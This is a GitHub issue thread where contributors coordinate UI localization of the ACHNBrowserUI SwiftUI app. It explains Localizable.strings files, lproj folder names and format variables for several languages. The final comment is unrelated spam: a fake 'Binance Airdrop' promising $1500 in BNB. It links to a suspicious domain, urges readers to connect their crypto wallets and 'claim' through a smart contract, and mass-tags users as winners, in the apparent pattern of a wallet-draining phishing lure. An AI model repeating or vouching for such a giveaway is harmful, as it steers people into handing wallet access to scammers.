### ISSUE TITLE
Localization

### ISSUE THREAD

**Issue by Dimillian** [Dimillian/ACHNBrowserUI#68]
Without even talking about the data, we need to localize at least the UI. 
There ton of Text constructed with variable in the middle of the string and I don't think it's a good pattern to have.
Anyway let's look into it. Never localized a SwiftUI app yet.

**Comment by TheVaan** [comment]
First steps in #92
I‘m going to continue my work. You may give this issue an „in progress“ label.

**Comment by TheVaan** [comment]
Let us create a check-list in the issue (maybe someone can copy paste):

- [x] English
- [x] German
- [ ] French
- [ ] Spanish
- [ ] Italien
- [ ] Russian
- [ ] Portuguese
- [ ] Chinese
- [ ] Japanese
- [ ] Korean

Add / remove languages as desired.

**Comment by klin0816** [comment]
I am able to provide ZH_TW Chinese localization but I am not good at Swift
Is that any template that I can fill in the translation?

**Comment by jonnyklemmer** [comment]
@klin0816 here's the "template" file you use for Localization in iOS:
https://github.com/Dimillian/ACHNBrowserUI/blob/master/ACHNBrowserUI/ACHNBrowserUI/en.lproj/Localizable.strings

so for example replacing
`"music" = "Music";`
with
`"music" = "音樂";`

I'm sure if you were able to do that it'd help @TheVaan out

**Comment by TheVaan** [comment]
@klin0816 That would be awesome! As @jonnyklemmer mentioned, there are no Swift skills necessary. We changed the way translation works a little bit - the linked English localization file is not complete.

You have to choose between two ways:
First:
- fork repo, navigate to `/ACHNBrowserUI/ACHNBrowserUI`
- create a folder named `zh_TW.lproj`
- copy and paste the files from the folder `de.lproj` to your new folder
- to localize `Localizable.strings`:
  - the file containts hundrets of lines with `"english string" = "german string"`; (left: key, right: value)
  - just forget what I have written in German, simply translate what you finde in the key into the value
  - `%@` (string) and `%lld` (number) are variables that should be inside your translation as well
  - there are 4 special keys, that can not be translated directly from the key: look into `en.lproj/Localizable.strings` to see the English value for the keys and translate them
  - one more "special thing": underneath `// CategoryRow` are the categorys with lowercased letter, I don't know how this is in Chinese but we use capital letter in the beginning because these strings are used as title in some views so the localization should also be capitalized
- to localize InfoPlist.strings:
  - this one is simple, here you only have to write the description that is shown when the app asks for access rights to photos. So you need to tranlate the following: `"Save images like furniture or generated images from the share function"` and replace the German value with yours

**Comment by klin0816** [comment]
@TheVaan Thanks for your guide anyway.
I will try to complete the translation ASAP.

**Comment by mimikun** [comment]
Hello.
I want to Japanese Localization.
Would you tell me how to do it?

**Comment by TheVaan** [comment]
@mimikun that's great! Thank you! You can follow the tutorial I posted above. Use as name for your folder `ja.lproj` - you don't need Xcode, it can be done with any editor, case the strings file is plain UTF.

**Comment by Dimillian** [comment]
Or UTF-16 in case of Japanese/Chinese, and it works. Just pulled the Chinese items and now we have it in the app @klin0816 :) 
<img width="559" alt="Screenshot 2020-05-14 at 08 42 28" src="https://user-images.githubusercontent.com/535509/81901599-10b7e200-95bf-11ea-9b67-acbcfdfff082.png">
![Simulator Screen Shot - iPhone 8 - 2020-05-13 at 13 28 19](https://user-images.githubusercontent.com/535509/81901607-14e3ff80-95bf-11ea-8c6a-c66dc32fe598.png)

**Comment by mimikun** [comment]
@TheVaan 
Thanks.
I'll try to complete the translation ASAP.

**Comment by kartbnb** [comment]
I am able to provide “Chinese Simplified” and I am familiar with swift. But there is no “Chinese Simplified” option in your comments☹️

**Comment by TheVaan** [comment]
@kartbnb I can add it. The amount of Chinese language variants is not that transparent to me 😅 
You are welcome to create a pull request with translated data!

**Comment by kartbnb** [comment]
> @kartbnb I can add it. The amount of Chinese language variants is not that transparent to me 😅
> You are welcome to create a pull request with translated data!

Just a simple question on how to add new Localizable. I just need to create a new Directory and named it and then add a "Localizable.strings" file into it?

**Comment by TheVaan** [comment]
You have two options:
- simply add the folder then import the localization; file doesn’t have to be translated at this point, it only has to exists (or @Dimillian can import)
- add a new localization to Localizable.Strings via menu

**Comment by MrOgeid** [comment]
Hi, I can provide the Italian localization, if anybody isn't working on it just yet. 😀 The folder name for the Italian language is `it_IT.lproj` ?

**Comment by TheVaan** [comment]
@MrOgeid this would be awesome! There is no one translating to Italian (as far as we know). The folders name has to be it.lproj

**Comment by MrOgeid** [comment]
@TheVaan Ok! Thank you for the correct folder's name! I'll try to translate all the string as soon as possible!

**Comment by Dimillian** [comment]
And for items and villagers, they should already display in Italian. You can confirm @MrOgeid ?

**Comment by MrOgeid** [comment]
@Dimillian Villager's name are displaying in Italian but I see the items in the Catalog in English.

**Comment by Dimillian** [comment]
@MrOgeid On latest commit I've enable Italien so you'll find the correct folder and file. And it also enable Italien items :) 
![Simulator Screen Shot - iPhone 8 - 2020-05-19 at 17 59 41](https://user-images.githubusercontent.com/535509/82349546-888c6f00-99fa-11ea-8953-aa743f9c170a.png)

**Comment by MrOgeid** [comment]
@Dimillian Sorry, probably I didn't understand.😅 I don't have access right know to Xcode as I'm not a very expert software developer, I'm more a graphic designer and copywriter.

**Comment by Dimillian** [comment]
Well if you start your translation from the last commit, you'll find the It.lproj folder with the file ready :)

**Comment by MrOgeid** [comment]
Thanks @Dimillian !

**Comment by MrOgeid** [comment]
Hi @Dimillian I translated in Italian all the strings from Localizable.strings in the "de.lproj" folder into the same file in the "it.lproj" folder. But I'm not quite sure if I made a correct pull request.😬

**Comment by Dimillian** [comment]
Congrats to @mimikun for adding japanese in #136 !!

**Comment by Dimillian** [comment]
Added credits in our readme :) https://github.com/Dimillian/ACHNBrowserUI#localizations-credits

**Comment by Dimillian** [comment]
I'll try to tag on this issue everything I'm adding to French localization (which should be everything we have to localize) so it give a change to anyone who wants to updated their localization file to do so :)

**Comment by rohanrk** [comment]
I figure this thread is better than opening a new issue but there are quite a few strings that are in other languages that aren't in the English file (e.g: "Friendly Reminder") Should the English strings file be expanded?

**Comment by TheVaan** [comment]
No. Swift uses the key as translation if there is no localization. So we only add a key to the English localization if it is an unreadable key.

**Comment by AndyH0ng** [comment]
I think I'm done with Korean one. Is there anything missing I have to do?

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @hoangpq, @mikalv, @shoman4eg, @karl0-dev, @christophwitzko, @HintikkaKimmo, @hero5512, @0x4E33, @kaito2, @maxweng, @kevink1103, @adminOfBincentive, @deckarep, @binsonze, @uzbekdev1, @zachhhhh, @baranovskis, @kuolun, @miguelmota, @Jimexist, @yepp4you, @Czechh, @andrazk, @valtab, @WhiteCrow, @ronghuazhao, @summertao, @yrxwin, @bubble501, @yangrq1018, @k-terashima, @jcoder76, @sergiotm87, @rich678s, @guayadeque, @xgdgsc, @realspal, @FlowerWrong, @HsingPeng, @kevinbg012, @youfoundron, @frandieguez, @RebornFlamme, @trunkszi, @alexrigler, @oscar3x39, @davedele, @mehmetcanyegen, @haiheipijuan, @andyidea
